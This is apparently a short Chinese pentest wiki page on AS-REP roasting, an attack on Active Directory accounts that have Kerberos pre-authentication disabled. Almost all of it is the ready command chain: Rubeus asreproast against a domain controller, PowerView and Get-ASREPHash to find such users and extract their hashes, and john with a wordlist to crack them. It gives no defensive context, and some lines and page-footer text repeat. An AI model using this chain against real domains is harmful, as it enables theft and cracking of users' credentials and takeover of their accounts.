ASEPRoasting
当用户关闭了kerberos预身份认证时可以进行攻击
>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com
最后更新于
这有帮助吗?
当用户关闭了kerberos预身份认证时可以进行攻击>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com最后更新于
这有帮助吗?
这有帮助吗?
或使用Powerview结合https://github.com/gold1029/ASREPRoast
获取不要求kerberos预身份验证的域内用户
>Get-DomainUser -PreauthNotRequired -Properties distinguishedname –Verbose>Get-ASREPHash -UserName y -Domain zone.com -Verbose破解RC4-HMAC AS-REP
>john hash.txt --wordlist=wordlist.txt